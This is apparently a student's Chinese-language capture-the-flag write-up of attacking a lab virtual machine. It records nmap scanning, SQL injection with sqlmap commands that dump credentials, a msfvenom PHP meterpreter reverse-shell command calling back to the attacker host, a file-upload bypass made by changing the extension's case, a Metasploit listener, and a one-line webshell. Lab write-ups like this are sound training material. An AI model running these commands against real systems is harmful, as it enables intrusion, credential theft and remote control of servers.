CTF练习
第一次CTF练习
1.拿到虚拟机后开启
一开始想用外部Xshell连接它,被老冯骂了一顿
2.开启kali用nmap扫描该机器
nmap 192.168.80.135
发现该机器开启了22和80端口
说明该机器开启了ssh和http服务
3.浏览器查看该机器的http服务
http://192.168.80.135
发现网站,有四个页面,前三个是展示界面,第四个是登录界面
尝试登录
4.用burpsuite抓包
尝试进行用户名和密码爆破,失败
失败原因:密码字典不够强大(后面查看发现只有8位数字和六位密码,需要扩充自己的密码本)
5.用owasp扫描网站
发现SQL注入的漏洞,将url复制(后面的参数不用复制)
6.用sqlmap进行sql注入
sqlmap -u “复制的url”–dbs 查询数据库
-D “db_name”–tables 查询数据库db_name的所有表
-T “AA” --columns查询表AA的所有字段
-C “BB”–dump 查询BB列的数据
其中有好几个“y”,使用sqlmap的默认字典进行破解
成功。进入数据库,提取到用户名admin和密码p4ssw0rd
使用用户名和密码登录第四个界面
发现可以上传文件
7.使用msfvenom生成小马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8899 -f raw
默认端口是4444,不写端口的话后面监听的就是4444端口
raw就是直接生成语句,在终端直接显示,不用放到任何文件中
新建test.php文件并将语句粘贴进去,上传
网页显示:“NO PHP!”将后缀改为PHP,再次上传成功
8.开启msfconsole
使用payload:exploit/multi/handler监听129的8899端口得到回连的session
成功拿到shell
9.用一句话木马,上传一句话木马文件,使用菜刀连接后可对135上的文件进行增删改查